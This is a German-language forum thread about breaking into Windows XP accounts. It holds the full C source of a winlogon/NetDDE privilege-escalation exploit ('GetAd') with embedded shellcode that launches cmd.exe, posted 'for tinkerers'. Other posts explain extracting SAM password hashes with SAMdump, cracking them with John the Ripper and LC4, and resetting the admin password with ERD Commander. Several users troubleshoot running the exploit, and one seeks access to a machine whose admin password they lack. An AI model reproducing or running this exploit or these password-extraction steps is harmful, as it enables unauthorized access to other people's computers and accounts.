Passwort unter Win XP

Original von AaFreak
also ist win xp doch nicht so sicher wie es viele behaupten! ...

by aafreak

LOL, mit was hast du früher gearbeitet? Sega Mega Drive? *lächel*

Bitte nicht ernstnehmen. Aber als eingeschworener UNIX'er ist das schon eine echte Stilblüte.
*gg*
 
wo bekomme ich denn diese 3 Programme her die ihr hier benutz habt. Beio google.de finde ich nichts wenn ich diese suche
 
mal ne kurze anmerkung:

ein 128bit passwort zu entschlüsseln ist afaik nicht mit heutiger rechnerleistung in akzeptabler zeit zu schaffen. das kann mathematisch begründet werden. da geht es um verdammt große primzahlen.

was wohl möglich ist, was auch mit den genannten programmen geschieht, ist das passwort zu raten. wenn ich die verschlüsselungsfunktion dazu benutze, so lange alle nur möglichen kombinationen von symbolen durchzuraten, kann ich abhängig von länge und beschaffenheit des passwortes, auch noch 1024bit codes knacken, aber eben nicht entschlüsseln in dem sinne.


mfg


blueflash aka greenflash aka flashblue
 
qell code

..hier für die Bastler:



//
/////////// Copyright ? 2002 Serus ////////////////
//mailto:serus@users.mns.ru
//
//This program check system on winlogon bug present
//Only for Windows 2000 and Windows XP
//This is for check use only!
//

#include <windows.h>
#include <stdio.h>


void main(int argc, char *argv[ ], char *envp[ ] )
{
char *buf;
DWORD Addr = 0;
BOOL bExec = TRUE;

unsigned char sc[] = { // my simple shellcode, it calls CreateProcess function,
// executes cmd.exe on user`s desktop and creates mutex.
0x8B, 0xF4,
0x68, 0x53, 0x45, 0x52, 0x00,
0x8B, 0xDC, 0x54, 0x6A, 0x00, 0x6A, 0x00,
0xB8, 0xC8, 0xD7, 0xE8, 0x77, 0xFF, 0xD0, 0x8B, 0xE6,
0x6A, 0x00, 0x68, 0x2E, 0x65, 0x78, 0x65, 0x68, 0x00,
0x63, 0x6D, 0x64, 0x68, 0x61, 0x75, 0x6C, 0x74, 0x68, 0x5C, 0x44,
0x65, 0x66, 0x68, 0x53, 0x74, 0x61, 0x30, 0x68, 0x00, 0x57, 0x69,
0x6E, 0x8B, 0xD4, 0x42, 0xB9, 0x50, 0x00, 0x00, 0x00, 0x6A, 0x00,
0xE2, 0xFC, 0x6A, 0x44, 0x83, 0xC4, 0x0C, 0x52, 0x83, 0xEC, 0x0C,
0x8B, 0xC4, 0x83, 0xC0, 0x10, 0x50, 0x8B, 0xC4, 0x83, 0xC0, 0x08,
0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00,
0x6A, 0x00, 0x83, 0xC2, 0x10, 0x52, 0x6A,
0x00, 0xB8, 0x4D, 0xA4,
0xE9, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0xC3
};

HWND hWnd;
COPYDATASTRUCT cds;
OSVERSIONINFO osvi;
HMODULE hMod;
DWORD ProcAddr;
HANDLE hMutex;
char mutname[4];
char aaa[200];
int n,m;
HWND h=1111;

printf("nn==== GetAd by Serus (serus@users.mns.ru) ====");

// Get NetDDE Window
hWnd = FindWindow("NDDEAgnt","NetDDE Agent");
if(hWnd == NULL)
{
MessageBox(NULL, "Couldn't find NetDDE agent window", "Error", MB_OK | MB_ICONSTOP);
return;
}

// Get CreateProcessA and CreateMutexA entry addresses
hMod = GetModuleHandle("kernel32.dll");

ProcAddr = (DWORD)GetProcAddress(hMod, "CreateProcessA");

if(ProcAddr == 0)
{
MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP);
return;
}
*(DWORD *)(sc + 86 + 21) = ProcAddr;

ProcAddr = (DWORD)GetProcAddress(hMod, "CreateMutexA");
if(ProcAddr == 0)
{
MessageBox(NULL, "Couldn't get CreateMutexA address", "Error", MB_OK | MB_ICONSTOP);
return;
}
*(DWORD *)(sc + 15) = ProcAddr;

//Generate random Mutex name
srand(GetTickCount());

do
{
mutname[0] = 97 + rand()%25;
mutname[1] = 65 + rand()%25;
mutname[2] = 65 + rand()%25;
mutname[3] = 0;
}
while((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0);
memcpy(sc + 3, mutname, 4);

//Form buffer for SendMessage
buf = (char *)malloc(1000);
memset(buf, 0xC3, 1000);
memcpy(buf, sc, sizeof(sc));

cds.cbData = 1000;
cds.dwData = 0;
cds.lpData=(PVOID)buf;

//Get OS version
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if(GetVersionEx(&osvi) == 0)
{
printf("nWarning! Couldn't get OS verson. Trying as Win2k.n");
osvi.dwMajorVersion = 5;
}


if(osvi.dwMajorVersion != 5)
{
MessageBox(NULL, "This program for Win2k and WinXP only!", "Error", MB_OK | MB_ICONSTOP);
return;
}

if(osvi.dwMinorVersion == 0)
{
// Windows 2000

printf("nnUse Windows 2000 offsets");

//If first login
//Send shellcode buffer
SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
//Try execute it at 0x0080FA78
PostMessage(hWnd, WM_TIMER, 0, (LPARAM)0x0080FA78);

printf("nTrying at 0x%X", 0x0080FA78);

//If fails (perhaps not first login)
//Try to bruteforce shellcode addresss
for(Addr = 0x0120fa78; Addr < 0x10000000; Addr += 0x10000)
{
//If mutex exists, shellcode has been executed
if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0)
{
//Success
printf("nSuccess!!!n");
printf("nWarning! You system has vulnerability!n");
CloseHandle(hMutex);
return;
}
printf("rTrying at 0x%X", Addr);

SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
PostMessage(hWnd, WM_QUIT, 1, (LPARAM)Addr);
}
}
else
{
// Windows XP

printf("nnUse Windows XP offsetsn");

//Try to bruteforce shellcode addresss

for(m = 100; m <= 0xffff; m++)
{

for(Addr = 0x00A0FA74; Addr < 0x01000000; Addr += 0x10000)
{
//If mutex exists, shellcode has been executed
if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0)
{
//Success
printf("nSuccess!!!n");
printf("nWarning! You system has vulnerability!n");
CloseHandle(hMutex);
return;
}
printf("rTrying at 0x%X Message = 0x%X", Addr, m);

SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
PostMessage(hWnd, m, (LPARAM)Addr, (LPARAM)Addr);
}

}

}

//Bug in winlogon not presents
printf("nnBad luck! Try after first logon.nn");

}
 
es wundert mich ja, dass noch keiner vom cia bzw erd-commander gehört bzw hier erwähnt hat...

erdcommander erinnert zb stark an linux knoppix nur dass es sich um ein xp nachbau handelt, der ebenfalls wie knoppix nur in den ram geladen wird und von da aus aufs windows system zugreift.
wie dem auch sei, im erdcommander direkt ist ein programm mit bei,was sich locksmith nennt und der fordert einen dazu auf ein neues admin pw einzugeben
jetzt nur noch rebooten und schon kann man sich unter xp mit seinem neu gesetzten pw einloggen.
 
@m4dl355 du musst vielleicht einfach mal vernünftig suchen... ich hab's grade extra nochmal versucht, weil ich mir nich vorstellen konnte das google dazu nix findet und ich hab genügend Links rausbekommen...

Tipp: gib mal "Programmname" download ein
 
hallo,

was ich an der ganzen sache nicht verstehe ist, warum gibts immer ein Adminsitrator in der hash datei, auch auf meinem eigenen system, obwohl ich kein bentuzerkonto angelegt habe
 
Bei der 128-Bit-Entschlüsselung + Brute Force handelt es sich um ein Missverständnis.

Zunächst einmal: Der Hash wird tatsächlich verschlüsselt in der SAM hinterlegt. Dabei wird der Hash sogar in drei Portionen zerteilt, wobei jede über dasselbe Verfahren, aber mit unterschiedlichen Schlüsseln codiert wird. Danach werden die Codeschnipsel zusammengefügt und ergeben den Verschlüsselten Hash. Einfach unknackbar. Toll.

Was dabei nicht bedacht wird, ist, daß die Schlüssel im System bekannt sein müssen, weil man den Hash-Wert ja wieder im "Klartext" benötigt, um die Authentifizierung zu ermöglichen. Also was machen diese "bösen" Tools? Sie holen sich den Systemschlüssel und verwenden gemeiner Weise auch noch die .dll-Routinen von MS, um den Hash kurzerhand zu entschlüsseln. Gemeine Sache, das.

MS kann nun mit der hohen Sicherheit werben und behaupten, daß der verschlüsselte Passwort-Hash in zig Billionen von Jahren nicht geknackt werden kann. Und das stimmt sogar. Sie müssen ja dabei nicht erwähnen, daß der Schlüssel ebenfalls auf dem System liegt und man den Hash deshalb gar nicht knacken muß. MS eben.

Tatsache ist, daß die Tools den Hash unverschlüsselt aus dem System holen.

@blueflash
Original von blueflash
ein 128bit passwort zu entschlüsseln ist afaik nicht mit heutiger rechnerleistung in akzeptabler zeit zu schaffen. das kann mathematisch begründet werden. da geht es um verdammt große primzahlen. was wohl möglich ist, was auch mit den genannten programmen geschieht, ist das passwort zu raten. wenn ich die verschlüsselungsfunktion dazu benutze, so lange alle nur möglichen kombinationen von symbolen durchzuraten, kann ich abhängig von länge und beschaffenheit des passwortes, auch noch 1024bit codes knacken, aber eben nicht entschlüsseln in dem sinne.
Wie willst Du denn ein Kennwort per Brute Force ermitteln, welches auf einen >>verschlüsselten Hash<< paßt? Das geht nicht. Der Hash muß zuvor entschlüsselt sein, ehe man sich an die Arbeit macht, ein gültiges Passwort wie oben beschrieben zu ermitteln. ;-)

@boban2k
Das Administrator-Konto wird per default während der Installation angelegt.

Bye, nz
 
Bei mir sagt er bei GetAd2.exe immer "Couldn´t find NetDDE Agent Window"
... verdammt bei M$ hab ich irgendwo gelesen,dass der Bug schon bekannt ist und ... naja is ja logisch, dass es bekannt ist, aber haben sie´s evtl. im SP2 schon gefixt?

//Edit
Hat sich erledigt,is nen Windows Dienst, hatte ich deaktiviert :D

//Edit2
sh*t, same shit each day ... geht trotzdem net ... arbeite dran
wenn jemand idee hat, immer raus damit
 
Original von NeonZero
Bei der 128-Bit-Entschlüsselung + Brute Force handelt es sich um ein Missverständnis.

Zunächst einmal: Der Hash wird tatsächlich verschlüsselt in der SAM hinterlegt. Dabei wird der Hash sogar in drei Portionen zerteilt, wobei jede über dasselbe Verfahren, aber mit unterschiedlichen Schlüsseln codiert wird. Danach werden die Codeschnipsel zusammengefügt und ergeben den Verschlüsselten Hash. Einfach unknackbar. Toll.

Was dabei nicht bedacht wird, ist, daß die Schlüssel im System bekannt sein müssen, weil man den Hash-Wert ja wieder im "Klartext" benötigt, um die Authentifizierung zu ermöglichen. Also was machen diese "bösen" Tools? Sie holen sich den Systemschlüssel und verwenden gemeiner Weise auch noch die .dll-Routinen von MS, um den Hash kurzerhand zu entschlüsseln. Gemeine Sache, das.

MS kann nun mit der hohen Sicherheit werben und behaupten, daß der verschlüsselte Passwort-Hash in zig Billionen von Jahren nicht geknackt werden kann. Und das stimmt sogar. Sie müssen ja dabei nicht erwähnen, daß der Schlüssel ebenfalls auf dem System liegt und man den Hash deshalb gar nicht knacken muß. MS eben.

Tatsache ist, daß die Tools den Hash unverschlüsselt aus dem System holen.


Und welche Tools machen das? Und dann noch womöglich ohne als Admin angemeldet zu sein?
 
es gibt wohl schon genug Brute Forcer die diese Tools implementiert haben. Andererseits wendeste dich eher an die bereits genannten.

Viel Spaß :)
 
@mondi
sorry, wenn ich so dazwischen komme, aber bei mir funktiniert das PW von WinXP knacken (auch) nicht.
Also ich hab ziehmlich viel ausprobiert:

Also erstmal war das gesetze PW nur 3 Stellen lang, ohne Sonderzeichen, und in einer Datei als Wordlist abgespeichert.

Die Wordlist habe ich mit john the ripper eingeladen und versucht die Sam Datei zu knacken.
Ergebnis: nichts.
Danach die Wordlist wieder eingeladen, diesmal mit LC4 ausprobiert.
Ergebnis: nichts.
So, als nächstes mit SAMdump hash aus der SAM datei rausgeholt, in ner weiteren Datei abgespeichert, und wieder mit beiden Programmen ausprobiert.
Ergebnis: nichts.
So, nun das PW aus dem Arbeitsspeicher auslesen.
Hat gefunzt(mit LC4 und noch nem anderen Tool), war ja auch klar.

So jetzt meine Frage:
Warum funktioniert das nicht bei dem Auslesen der SAM Datei?
 
@1337Kuh

das entschlüsseln geht nur das erzwingen von admin rechten nicht.

ich habe es unte r2k mit allen sp´s getestet und unter xp auch es ging immer auser mit xp sp2 aber wen ich mir die SAM Datei anderst geklaut habe ging das entschlüsseln.

als wen du die anleitung von posidron befolgen sollte es gehen.
aber wenn du wilst kann ich dir eine detajiertere(keine ahnung wie mans schreibt) bechreibung geben
 
Bei mir kommt auch immer "Couldn´t find NetDDE Agent Window" wenn ich GetAd2 starte, mache ich was falsch? Weis jemand was dazu? Schon im Voraus Danke

MfG Devastor
 
meine augen tun schon weh vorm lesen...

also ich hab das ganze hier jetzt durchgelesen aber irgnewdie kommts noch imme rnich bei mir an.

ich hab nen pc mit passwort XP SP2 und per F8 gehts auch net weil der admin ein passwort hat, es gibt auch nen 1sten Admin...

so, nun besteht meine aufgabe indem das ich das passwort herausfinde um es zu ändern ohne mich einloggen zu können.

Also ne antowrt das das geht und mit hier shcon beschriebn ist brauch ich nur ne antwort

[ ]JA [ ]NEIN

oder wer will kanns nochmal für mich zusammenfassen xD
 
Original von Devastor
Bei mir kommt auch immer "Couldn´t find NetDDE Agent Window" wenn ich GetAd2 starte, mache ich was falsch? Weis jemand was dazu? Schon im Voraus Danke

MfG Devastor

Nein. Im Prinzip hast du einfach nur Pech. Der NetDDE Agent ist deaktiviert.

Original von Devastor
Also ne antowrt das das geht und mit hier shcon beschriebn ist brauch ich nur ne antwort

[X]JA [ ]NEIN

Original von Devastor
oder wer will kanns nochmal für mich zusammenfassen xD

Meinst du ich gönne dir das Wissen wenn dein Interesse nicht gross genug ist um es selber rauszufinden?
 
Also ich hab ersteinmal den netDEE-Modus eingeschalten. Dann ha ich den getad2.exe durchlaufen lassen und da kommt aber dummerweise folgendes:



==== GetAd by Serus (serus@users.mns.ru) ====

Use Windows XP offsets
Trying at 0xFFFA74

Bad luck! Try after first logon.

Ich hab mich mit meinem Admin Konto bestimt 10mal angemeldte, aber es ändert sich nichts. Reboot hat auch nicht gewirkt.
Woran liegt das?
 
Zurück
Oben